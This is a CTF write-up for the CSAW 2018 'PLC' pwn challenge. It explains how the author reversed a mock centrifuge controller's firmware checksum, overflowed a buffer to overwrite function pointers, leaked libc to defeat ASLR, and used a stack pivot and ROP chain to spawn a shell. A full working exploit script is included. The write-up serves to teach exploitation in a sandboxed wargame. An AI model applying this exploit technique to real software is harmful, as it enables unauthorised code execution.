PLC

CSAW CTF Qualifiers 2018

We’ve burrowed ourselves deep within the facility, gaining access to the programable logic controllers (PLC) that drive their nuclear enrichment centrifuges. Kinetic damage is necessary, we need you to neutralize these machines.

You can access this challenge at https://wargames.ret2.systems/csaw_2018_plc_challenge

A much belated post. This is a pwn challenge on a custom online wargaming platform. We are provided with the assembly of what’s ostensibly a programmable logic controller (PLC) for a centrifuge in a nuclear reactor. The challenge looks like it’s still up, so you can take a look and follow along.

This was the first ROP (okay, spoiler, it’s a ROP) I ever pulled off live during an actual CTF, which I was pretty excited about. The web platform meant I had to worry less about setup, and even though some of the tools it provided were a little lacking (no gdb shortcuts like until, no pwntools utilities for packing/unpacking numbers, … no one_gadget), I think they ultimately made the whole thing a lot more educational for me, so kudos to the folks behind it. I’ve included a brief description of all the exploit techniques that lead up to ROP when we get to that, so hopefully this post will be useful even if you don’t know much about pwning binaries. The prerequisites would be some knowledge with x86 assembly, how executables are loaded into memory, and how to use gdb (or fictionalized web knockoffs thereof).

The wargaming platform has a sequence of six checkpoints/achievements. The first four are simple enough once you reverse-engineer the assembly, the fifth just requires you to overflow a buffer (although it didn’t tell this to you literally and I actually couldn’t figure out what my goal was at first), but (as you’d expect) the sixth requires you to pop a shell and get the flag, which is ultimately the only thing that mattered for the CTF.

Reversing

We have C code for the outermost loop of the PLC. In this loop, the PLC accepts one of five single-character commands:

  • U updates the firmware.
  • E executes the firmware.
  • S prints the PLC status.
  • R resets the PLC.
  • Q breaks.

Understanding how to run commands is enough to get the first checkpoint.

Even though only one character matters, the PLC reads input into a massive buffer char cmd[128] = {} on the stack and then just uses the first character from that. Unfortunately it’s done with a properly fgets with the proper parameters, so we can’t smash the stack here. Still, we’ll see how it’s useful later.

This is pretty much all we get before we have to start reading assembly. There isn’t too much to say about this; it’s just understanding x86 instructions, making note of memory locations that keep reappearing, and figuring out what they’re used for. There are plenty of debug print statements that tell you what many branches of code do, so once you put some time in, it’s not too hard to figure out what most of the variables are. Most things are statically allocated:

  • 0x202499 is a boolean debug flag that causes the code to print additional information.
  • 0x2028a0 is a register that holds the RPM of the centrifuges. If the register exceeds 0x109a0 = 68000, either an alert or failsafe is triggered.
  • 0x2028a4 is a 0x40-byte buffer that stores the enrichment material as a string. On initialization it is memset to all 0’s and then set to the hardcoded string “<none>”.
  • 0x2028e4 is a boolean override flag, which controls whether an alert or a failsafe occurs when the RPM exceeds the dangerous threshold.
  • 0x2028e8 is a function pointer to rpm_alert.
  • 0x2028f0 is a function pointer to rpm_abort.

The checkpoints guide you to first reverse update_firmware, which reads in firmware from stdin and then checks in a few ways that the firmware is valid, including a call to a fairly complicated validate_checksum. You can get the checkpoints just by stepping through update_firmware and changing the registers right before each conditional branch that would cause an invalidation, and we did this, but cheating this way won’t ultimately work against prod. Still, if you do this you can quickly get a handle on where the checks are and then it’s not too hard to read them off.

Let’s see what’s going on in update_firmware. We start by reading from stdin into [rbp-0x410] with this code, which calls fread:

0xf12:  mov     rdx, qword [rel 0x202490]
0xf19:  lea     rax, [rbp-0x410]
0xf20:  mov     rcx, rdx
0xf23:  mov     edx, 0x400
0xf28:  mov     esi, 0x1
0xf2d:  mov     rdi, rax
0xf30:  call    fread

As per x86-64 calling convention, the arguments for a function call go in the registers rdi, rsi, rdx, and rcx in that order, so this is fread(rbp-0x410, 0x1, 0x400, *[rel 0x202490]). I don’t actually know what is at [rel 0x202490], but it’s pretty reasonable to guess that it’s the file pointer to stdin, because what other file pointers are there even? So this reads 0x400 bytes into memory onto the stack, starting at rbp-0x410.

Peeking ahead at the success/failure messages tells us that [rbp-0x414] is a failure flag; if it’s 0 then the update succeeds, if it’s nonzero then the update fails.

0xfcc:  cmp     dword [rbp-0x414], 0x0
0xfd3:  je      0xfe3

0xfd5:  lea     rdi, [rel 0x15e6]  "FIRMWARE UPDATE FAILED!"
0xfdc:  call    puts
0xfe1:  jmp     0xfef

0xfe3:  lea     rdi, [rel 0x15fe]  "FIRMWARE UPDATE SUCCESSFUL!"
0xfea:  call    puts

There are four simple checks that are simply conditional branches in update_firmware. The first two check if the first two bytes of the firmware are 0x46 = 'F' and 0x57 = 'W', respectively:

0xf35:  movzx   eax, byte [rbp-0x410]
0xf3c:  cmp     al, 0x46
0xf3e:  jne     0xf4b

0xf40:  movzx   eax, byte [rbp-0x40f]
0xf47:  cmp     al, 0x57
0xf49:  je      0xf57

0xf4b:  mov     dword [rbp-0x414], 0x1 ; fail!
0xf55:  jmp     0xfcc

0xf57:  (checks continue)

Makes sense, FW is short for FirmWare.

The third and fourth come after the validate_checksum call, but since they’re simple, we’ll get them out of the way first. They check if the fifth and sixth bytes of the firmware are less than 0x39 = '9'. If you look ahead to where they’re printed, you’ll see that these bytes are printed as the major and minor version. But they don’t really do anything.

0xf76:  movzx   eax, byte [rbp-0x40c]
0xf7d:  movzx   eax, al
0xf80:  sub     eax, 0x30
0xf83:  cmp     eax, 0x9
0xf86:  jg      0xf9a

0xf88:  movzx   eax, byte [rbp-0x40b]
0xf8f:  movzx   eax, al
0xf92:  sub     eax, 0x30
0xf95:  cmp     eax, 0x9
0xf98:  jle     0xfa6

0xf9a:  mov     dword [rbp-0x414], 0x3
0xfa4:  jmp     0xfcc

At the end the updating happens by copying [rbp-0x410] into [rel 0x2024a0], which is a statically allocated buffer for the firmware. (rep is a weird x86 command prefix that can come before some commands to indicate “repeat them rcx times”; here it modifies movsq, move some number of quad-words, specifically 0x80 in this case.)

0xfa6:  mov     eax, 0x0
0xfab:  call    reset_plc
0xfb0:  lea     rax, [rel 0x2024a0]
0xfb7:  lea     rdx, [rbp-0x410]
0xfbe:  mov     ecx, 0x80
0xfc3:  mov     rdi, rax
0xfc6:  mov     rsi, rdx
0xfc9:  rep movsq qword [rdi], [rsi]

Anyway, now is a good time to go back and focus on validate_checksum, which we can see is called with a pointer to the freshly read firmware input:

0xf57:  lea     rax, [rbp-0x410]
0xf5e:  mov     rdi, rax
0xf61:  call    validate_checksum
0xf66:  test    eax, eax
0xf68:  je      0xf76

validate_checksum

I won’t go into excruciating detail, but here’s a quick play-by-play of how to reverse this function:

  • The primary loop is bracketed by these commands, which clearly mark [rbp-0xc] as a loop counter, and it is initialized to 2:

    0xe2c:  mov     dword [rbp-0xc], 0x2
    0xe35:  ...
    
    0xe6a:  add     dword [rbp-0xc], 0x1
    0xe6e:  cmp     dword [rbp-0xc], 0x1ff
    0xe75:  jle     0xe35
  • The checks at the end make clear that [rbp-0xe] is the “reported checksum” and [rbp-0x10] is the “actual checksum”:

    0xe82:  movzx   eax, word [rbp-0xe]
    0xe86:  mov     esi, eax
    0xe88:  lea     rdi, [rel 0x1580]  "[DEBUG] REPORTED FW CHECKSUM: %0…"
    0xe8f:  mov     eax, 0x0
    0xe94:  call    printf
    0xe99:  movzx   eax, word [rbp-0x10]
    0xe9d:  mov     esi, eax
    0xe9f:  lea     rdi, [rel 0x15a8]  "[DEBUG]   ACTUAL FW CHECKSUM: %0…"
    0xea6:  mov     eax, 0x0
    0xeab:  call    printf
  • After things hopping thorugh registers a bit more than necessary [rbp-0xe] is read off the third and fourth bytes of the firmware, [rax+0x2]:

    0xe0e:  mov     qword [rbp-0x18], rdi
    0xe12:  mov     rax, qword [rbp-0x18]
    0xe16:  mov     qword [rbp-0x8], rax
    ; ...
    0xe20:  mov     rax, qword [rbp-0x8]
    0xe24:  movzx   eax, word [rax+0x2]
    0xe28:  mov     word [rbp-0xe], ax

    Meanwhile, [rbp-0x10] is initialized to 0:

    0xe1a:  mov     word [rbp-0x10], 0x0
  • Finally, the meat of the checksum proceeds two bytes at a time as follows:

    • The checksum’s nybbles are cycled:

      0xe35:  movzx   eax, word [rbp-0x10]
      0xe39:  shl     eax, 0xc
      0xe3c:  mov     edx, eax
      0xe3e:  movzx   eax, word [rbp-0x10]
      0xe42:  shr     ax, 0x4
      0xe46:  or      eax, edx
      0xe48:  mov     word [rbp-0x10], ax

      This is basically eax = (eax << 12) | (eax >> 4).

    • The counter variable of the loop (starting from 2) is added to the checksum:

      0xe4c:  mov     eax, dword [rbp-0xc]
      0xe4f:  add     word [rbp-0x10], ax
    • Finally, two bytes are sliced from the firmware firmware[2*i:2*i+2] and xored into the checksum:

      0xe53:  mov     eax, dword [rbp-0xc]
      0xe56:  cdqe
      0xe58:  lea     rdx, [rax+rax]
      0xe5c:  mov     rax, qword [rbp-0x8]
      0xe60:  add     rax, rdx
      0xe63:  movzx   eax, word [rax]
      0xe66:  xor     word [rbp-0x10], ax

A bit involved but nothing terribly complicated. Anyway, armed with this we can write any firmware we want and attach a version, checksum, and prefix FW that the PLC will happily update to. This gets us past checkpoints 2 and 3 without cheating. In vanilla python (no pwntools) it looks like this:

execute_firmware and the Overflow

Now we’re at the meat of the PLC, which executes the firmware as some kind of virtual bytecode. It is very long, so I won’t go into the reversing details, but:

  • The instruction pointer is stored at dword [rbp-0x8].
  • The current instruction is stored at byte [rbp-0x9].
  • Some of the ASCII characters for digits are legal instructions. Some of them consume the character after them as well. Look for cmp byte [rbp-0x9], 0xsomething. The ones that are really of any interest are:

    • 2 followed by a character appends it to the string that represents the material being enriched.
    • 3 followed by 1 enables the override, causing alert to be called when the RPM increases above safe levels, rather than abort.
    • 7 increases the RPM.
    • 8 followed by 1 enables the debug flag.
    • 9 halts.

Once you go through this, the overflow just jumps right out: there are no bounds checks for the 2 command! So you can type bytes into the buffer and past its end, right into the following locations in memory. What are they again?

  • 0x2028a4 is a 40-byte buffer that stores the enrichment material as a string. On initialization it is memset to all 0’s and then set to the hardcoded string “<none>”.
  • 0x2028e4 is a boolean override flag, which controls whether an alert or a failsafe occurs when the RPM exceeds the dangerous threshold.
  • 0x2028e8 is a function pointer to rpm alert.
  • 0x2028f0 is a function pointer to rpm abort.

We have an override flag that nobody will validate and then two function pointers, so we have a controlled function call. In fact, by overflowing the buffer we may as well set the boolean override flag and cause alert to be called instead of abort. Now we can make the program jump to wherever we want it to.

As a very fast recap of the standard exploits in this case: In the case with the fewest security features, we’d find a way to input shellcode (pre-written x86 instructions that give us a shell) so that it’s written in memory somewhere easily accessible, and then call it. Unfortunately, just about all programs are now compiled with Data Execution Prevention (DEP, aka NX for no-execute), which means sections of memory where we could write anything (like the stack or the data section) are not allowed to be executed. The workaround is to use return-oriented programming, or ROP. This exploit technique assumes that we have a fair amount of control of the stack. To use it, we look through libc (the compiled C standard library, which is large) to find instructions or short sequences of instructions we want to execute that are followed by ret (return, which pops a position off the stack and jumps to it, and which gives the technique its name; these instructions or sequences are called “ROP gadgets”). Then, we jump to the first instruction while the stack is set up so that at the ret at the end of every gadget, the computer will return to the next gadget we want. libc is a section of memory that the computer is OK with executing, so this is fine.

Whereas normally we’d search for ROP gadgets by running some tool like ROPgadget or one_gadget, the wargames environment has a nice ROP tab where we can enter instructions and it will find them in libc for us. (It can also look in the executable itself, but it’s too small to have many useful ROP gadgets.)

Leaking libc

We still have to defeat the modern mitigation for ROPping though: Address Space Layout Randomization (ASLR). That is, the addresses of the various segments are randomized during each execution, including where libc is loaded into memory. As a result, when ASLR is on, we don’t know the runtime address of anything in libc. (It is important to note that unlike DEP and some other mitigation techniques, which are properties of the executable that determined by how it’s compiled, whether ASLR is on is a property of the operating system.) However, we can get around this if we manage to get the program to tell us the address of any particular thing in libc, because ASLR only starts each segment at a random position; everything in libc is still in the same relative position to everything else. This is simply called “leaking libc”.

The buffer overflow makes it easy to leak an address in libc, as the address right after the buffer is actually just a pointer to abort, which is in libc. So if we just overflow right up to the end of the buffer so that there are no longer any null terminators, and we run the S command to print the name, we’ll get a libc address after whatever we wrote in the buffer. Null bytes in the address present a minor issue here since the computer will just stop printing the string, but they are easy to manually fix and compare. My teammate ecnerwal implemented this part, so I didn’t have to worry about it.

Despite all this, we still don’t have enough to set up a ROP chain per se. Our buffer overflow is in the data segment, not on the stack, so we can’t actually control the return address; we only control a single call. What to do?

I didn’t know enough about ROP to answer this myself, so I hit up my favorite resource, RPISEC’s Modern Binary Exploitation course site, and went to the DEP & ROP lecture slides. The course notes are also a pretty good resource in general for everything I sort of hurriedly talked about in the last couple paragraphs about how to exploit a program where you have control of a jump. I remembered the theory of writing ROP chains and leaking libc to defeat ASLR, but I didn’t remember this last technique:

  • Typically in modern exploitation you might only get one targeted overwrite rather than a straight stack smash.
  • What can you do when you only have one gadget worth of execution?
    • Answer: Stack Pivoting

Bingo.

Stack Pivoting

Stack pivoting is a technique that’s useful when we only control one call and can only execute one ROP gadget. The idea is that we use our one gadget to move rsp (the stack pointer) somewhere where we can write things. That lets us control more of the stack, including hopefully the return address of our first ROP gadget and of any ROP gadgets after that.

In fact, that oddly massive buffer char cmd[128] = {} from the start is exactly what we need; it’s just a short distance away from the stack pointer, and we have full control over it.

Stepping through the program to look at the value of rsp at various points reveals that cmd is just 0x28 away from the stack pointer in the call that we control. We don’t want to pivot to exactly the start of cmd because we need to specify the PLC command with the first character, so we want to pivot to a little bit past it, as little as possible so that we have ample stack space.

Going into the ROP tab and searching up add rsp gives the gadget add rsp, 0x38 at 0xc9616. Calling this will pivot the stack to cmd + 0x10, at which point we can set up a full ROP chain.

We don’t need to be very creative with the ROP payload; we just want to call the syscall execve("/bin/sh", 0, 0), which gives us a shell. (The last two arguments for execve are arrays of arguments and environment variables for the executable; we just want them to be NULL so nothing weird happens.) Your search engine of choice will tell you that (on a 64-bit machine) execve is syscall number 59, or 0x3b. After looking for ROP gadgets that we want, we decide that we want to set up the stack like this (top to bottom), where parentheses denote the location of the ROP gadget:

(pop rax ; ret)
0x3b
(pop rdi ; ret)
(pointer to "/bin/sh")
(pop rdx ; pop rsi ; ret)
0
0
(syscall)

With ASLR off (there’s a little toggle slider in the wargaming platform’s settings menu), we can hardcode the actual addresses these instructions will be found at by looking at the addresses printed by the vmmap command. For example, the ROP tab says pop rax ; ret is found at 0x0000000000033544, and libc starts at 0x7f0000228000.

0x7f0000228000-0x7f00003e8000 r-x 2.23-0ubuntu10

So at runtime the pop rax ; ret gadget will be at the address 0x7f0000228000 + 0x33544. With ASLR on, we just take this and add the difference between the old address of abort in libc (which turned out to be 0x7f000025eec0), collected and hardcoded into our exploit when ASLR was off, and the new one recently leaked during the current run. The same thing is done with "/bin/sh", which can be found in libc using the debugger’s find command.

Our finished exploit, to be pasted in the wargaming environment’s Python window, looks as follows. It’s not the prettiest code and there are definitely a lot of improvements I would make now — for example, although we don’t have pwntools’ packing and unpacking functions, Python’s built-in struct module has functions that we can use with just a little finagling.

import interact

p = interact.Process()
for _ in range(5):
    p.readuntil('\n')

def run_firmware(program, execute_cmd='E', last_rd=True):
    program = 'FWxx99' + program + '9' * 0x400
    program = program[:0x400]

    checksum = 0
    for i in range(2, len(program)//2):
        checksum = ((checksum << 12) | (checksum >> 4)) & 0xffff
        checksum += i
        checksum &= 0xffff
        checksum ^= ord(program[2*i]) | ord(program[2*i+1]) << 8
    program = (program[:2] + chr(checksum & 0xff)
        + chr((checksum >> 8) & 0xff) + program[4:])

    p.sendline('U')
    p.sendline(program)
    p.flush()
    p.readuntil('\n')
    p.sendline(execute_cmd)
    p.flush()
    if last_rd: p.readuntil('\n')

def write_material(mat):
    run_firmware(''.join('2'+c for c in mat))

def read_material():
    p.sendline('S')
    p.flush()

    output = []
    for i in range(8):
        output.append(p.readuntil('\n')[:-1])
    material_readout = output[-2]
    assert 'ENRICHMENT MATERIAL' in material_readout
    material_readout = material_readout.split(': ', 1)[1]
    return material_readout

write_material('A' * 0x44)
material_readout = read_material()
assert material_readout[:0x44] == 'A' * 0x44

def base256_to_int(xs):
    n = 0
    for x in reversed(xs):
        n = 256 * n + x
    return n

rpm_alert_addr = material_readout[0x44:]
while len(rpm_alert_addr) < 8: rpm_alert_addr += '\0'
print([ord(c) for c in rpm_alert_addr])

print(base256_to_int([ord(c) for c in rpm_alert_addr]))

write_material('A' * 0x4C)
material_readout = read_material()
assert material_readout[:0x4C] == 'A' * 0x4C

abort_addr = material_readout[0x4C:]
while len(abort_addr) < 8: abort_addr += '\0'

# haxx for null bytes in address, esp. with ASLR off:
# abort_addr = abort_addr[:5] + '\x7f' + '\0\0'

current_abort = base256_to_int([ord(c) for c in abort_addr])
aslr_off_abort = 0x7f000025eec0L
aslr_offset = current_abort - aslr_off_abort

# given a ROP gadget address from the ROP tab, turn it into an
# actual string of bytes that's an address
def aslr_pos(pos):
    n = 0x7f0000228000 + aslr_offset + pos
    print 'aslr_pos =', hex(n)
    ret = []
    for i in range(8):
        ret.append(chr(n % 256))
        n //= 256
    return ''.join(ret)

# add rsp, 0x38
# puts stack pointer at cmd + 0x10, hopefully.
stack_pivot = aslr_pos(0xc96a6)
print 'stack pivot', repr(stack_pivot)

# run_firmware('7' * 100)

def run_and_jump(addr, execute_cmd):
    run_firmware(''.join('2'+c for c in 'A'*0x44 + addr) + '7' * 100,
        execute_cmd, last_rd = False)

print("wow!")
# run_and_jump(abort_addr)
run_and_jump(stack_pivot, 'E' * 16
    + aslr_pos(0x33544) # pop rax ; ret
    + '\x3b\0\0\0\0\0\0\0'
    + aslr_pos(0x21102) # pop rdi ; ret
    + aslr_pos(0x3b4d57 - 0x228000) # "/bin/sh"
    + aslr_pos(0x1150c9) # pop rdx ; pop rsi ; ret
    + '\0'*16
    + aslr_pos(0xbc375) # syscall ; ret
    )

p.sendline("ls")

p.interactive()

Running cat flag in our new shell gives us the flag!

flag{1s_thi5_th3_n3w_stuxn3t_0r_jus7_4_w4r_g4m3}

(note: the commenting setup here is experimental and I may not check my comments often; if you want to tell me something instead of the world, email me!)